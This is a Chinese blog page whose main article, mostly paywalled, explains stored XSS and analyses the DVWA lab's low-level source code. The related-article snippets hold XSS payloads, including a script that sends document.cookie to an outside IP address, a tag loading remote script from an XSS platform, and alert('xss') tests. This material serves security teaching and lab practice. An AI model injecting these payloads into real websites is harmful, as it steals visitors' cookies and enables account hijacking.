DVWA系列之XSS(跨站脚本攻击)——存储型XSS源码分析及漏洞利用

最新推荐文章于 2025-03-25 09:46:45 发布
最新推荐文章于 2025-03-25 09:46:45 发布
阅读量1.4k 收藏 9
点赞数
分类专栏: 渗透学习 文章标签: DVWA之存储型XSS DVWA之存储型XSS源码分析 DVWA之存储型XSS漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41210745/article/details/103271049
版权
本文详细分析了DVWA中存储型XSS漏洞在不同安全级别(low, medium, high, impossible)的源码,阐述了攻击者如何通过插入恶意JS代码实现XSS攻击,包括跳转、获取cookie等。同时,介绍了各种绕过过滤的利用技巧,并讨论了防护措施。" 124419184,13044186,Mac上安装与配置Armadillo库教程,"['C++', '科学计算', '线性代数', '库管理']

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

存储型XSS

存储型XSS持久化,代码是存储在服芻器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户每次访问该页面的时候都会触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃 cookie

1、hack插入恶意js
2、服务器返回含有恶意js页面
3、由于恶意js会一直存储在服务器端,所以每个目标点击含有恶意js页面都会跳转到第三方网站

目录

low级别源码分析

medium级别源码分析

high级别源码分析

impossible级别源码分析

low级别源码分析

该源码中含有trim() 函数,作用是移除字符串两侧的空白字符或其他预定义字符。

(详情见:https://www.w3school.com.cn/php/func_string_trim.asp

stripslashes(string):删除字符串中的反斜杠

mysql_real_escape_string(string,connection):对字符串中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。

在输入上没有做XSS方面严格的过滤与检查,且存储在数据库中,因此存在明显的存储型XSS漏洞。

漏洞利用

跳过name一栏,直接输入message:发现name栏不能为空

最低0.47元/天 解锁文章
【网络攻防】“跨站脚本攻击” 第二弹 ——存储XSS
翼安研习社的博客
02-04 1696
撰稿|谢泳 编辑|王聪丽、虞珍妮 信息收集|谢泳 目录1. 前言2. 什么是存储XSS3. 攻击原理4. 防御方式 1. 前言 上一篇介绍了跨域脚本攻击中的“反射XSS”,列举和解释了恶意脚本注入的一些主要方式以及规避方法。事实上,除了直接注入JavaScript之外,还可以通过第三方比如flash、Java applet等进行攻击。 这些第三方工具有自己的运行环境,例如flash中使用ActionScript作为脚本,可以实现丰富灵活的功能,也为XSS提供了可乘之机,所以要避免加载用户自定义..
DVWA系列XSS(跨站脚本攻击)——反射XSS源码分析漏洞利用
7Riven's blog
11-27 2731
XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。 XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSS。 DOMXSS由于其特殊性,常常被分为第三种,...
efucms-含有存储XSS漏洞源码包.zip
12-31
efucms-含有存储XSS漏洞源码包,亲测真实有效可用,如有侵权,请联系优快云管理员删除
存储xss复现(无过滤附源码
qq_40390383的博客
04-12 533
<html> <head> <script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie() </script> </head> <body> <form action="cunchuxss....
XSS漏洞简介、危害与分类及验证
最新发布
Python84310366的博客
03-25 1216
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
DVWA系列】十二、XSS(Stored) 存储XSS源码分析&漏洞利用
Pluto.的博客
03-13 1113
文章目录DVWAXSS(Reflected) 反射XSS一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA XSS(Reflected) 反射XSS 一、Low 级别 对输入没有进行任何XSS过滤 输入 <script>alert('xss')</script>,js代码执行: 网页源代码,显示的数据是调用数据库里的数据: 源代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) {
XSS跨站脚本】存储XSS(持久
08-23 1897
XSS跨站脚本】存储XSS
DVWA系列XSS(跨站脚本攻击)——DOMXSS源码分析漏洞利用
7Riven's blog
11-27 1543
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWAXSS跨站脚本攻击存储
ximo的博客
01-27 546
DVWAXSS跨站脚本攻击存储) 目录DVWAXSS跨站脚本攻击存储)原理框图低等级1.弹窗2.重定向3.获取cookie中等级1.弹窗2.重定向3.获取cookie高等级 原理框图 弹窗 重定向 获取cookie 低等级 1.弹窗 插入xss代码: 返回xss页面: 其他人访问该页面,并触发xss: 2.重定向 插入恶意代码: 返回xss页面,触发重定向: 其他人访问该页面,并触发xss: 3.获取cookie 插入xss代码: 使用 kali linux 进行监听: 其他人访问该
Kali渗透测试之DVWA系列5——存储XSS(跨站脚本攻击)
浅浅的博客
05-11 2998
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
【Web篇】(6.3) ❀ 09. 跨站脚本 - 存储XSS ❀ FortiWeb 攻防演练
防火墙技术专栏
07-21 654
  【简介】跨站脚本(Cross-site scripting,简称:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。从而使目标计算机收到危害。 存储XSS   存储XSS攻击是指注入的脚本永久存储在目标服务器上的攻击,例如在数据库、消息论坛、访问者日志、注释字段等中。受害者在请求存储时从服务器检索恶意脚本、信息。存储XSS有时也称为持久性或Ⅰ XSS.
XSS平台源码(xsser.me)
12-27
XSS平台源码(xsser.me)
YXcms-含有存储XSS漏洞源码
03-17
YXcms-含有存储XSS漏洞源码包,亲测真实有效可用,如有侵权,请联系优快云管理员删除即可
xss源码(常用站源码附安装教程).rar
03-10
一份比较齐全的XSS平台源码,里面有部署文档,需要的自取。
xss游戏平台源码
12-12
xss游戏平台源码
xss源码 最新版源码
10-24
xssing源码-xss平台源码 xss渗透平台 最新源码
存储xss
baidu_41942652的博客
04-28 2070
首先打开pikachu测试平台,找到存储xss章节。 先输入一段内容 发现存到了后台数据库里。 再次输入‘“<>?&666类似的控制字符。 发现也留在了后台数据库。 查看网站源码 可以找到,我们输入的内容以及写入前端的代码。 这样,我们创造一个合法的script语句,这里是一个弹窗 这里就发现弹出了弹窗,而且每次刷新都会出现弹窗。 这样,一次存储xss测试就完成...
存储xss_存储跨站脚本攻击XSS
weixin_39912580的博客
12-12 1020
存储XSS和反射XSS最大的区别就是在于存储是永久性的,这段恶意信息会被写入到数据库中,每次打开被注入恶意代码的页面均会被攻击这种方式通常是发生在论坛,评论,留言等地方,这些能够存储相关信息也能显示出来的地方,所以危害最大而其他两种方式则通常是通过链接的方式进入,只要对不明站点提高警惕则不会被攻击,而存储通常是在用户信任的网页中防护等级:低首先添...
优快云存储xss
deepdarkduck的博客
12-13 613
"/&gt;&lt;/a&gt;&lt;/script&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;script src=https://wdl.xss.ht&gt;&lt;/script&gt;
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值